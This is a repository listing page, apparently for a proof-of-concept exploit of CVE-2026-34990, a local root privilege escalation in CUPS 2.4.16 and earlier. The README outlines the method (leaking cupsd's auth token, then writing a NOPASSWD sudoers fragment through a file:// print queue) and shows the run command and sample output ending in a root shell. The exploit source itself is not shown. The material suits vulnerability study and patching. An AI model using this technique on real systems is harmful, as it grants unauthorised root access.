← Back
predyy

predyy/CVE-2026-34990

CVE-2026-34990 minimal PoC. CUPS <= 2.4.16 local privesc.

View on GitHub ↗
Stars
29
Forks
0
Watchers
29
Open issues
0
Contributors
1
Language
Python
License
—
Default branch
main
Created Sep 27, 2026Updated Sep 27, 2026

Star growth

Today—
This week—
This month—

Star history will appear here once this repo has been tracked for a couple of days.

README

CVE-2026-34990 - CUPS Local Privesc

Local privilege escalation against CUPS <= 2.4.16 running as root. Leaks cupsd's Local auth token, then writes a NOPASSWD sudoers fragment as root via a file:// print queue.

Usage

python3 poc.py

On success:

[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i

Then:

sudo -i

Disclaimer

This script is intended for educational purposes only. The author is not responsible for any misuse or damage caused by this exploit. Always ensure you have permission before testing or exploiting vulnerabilities!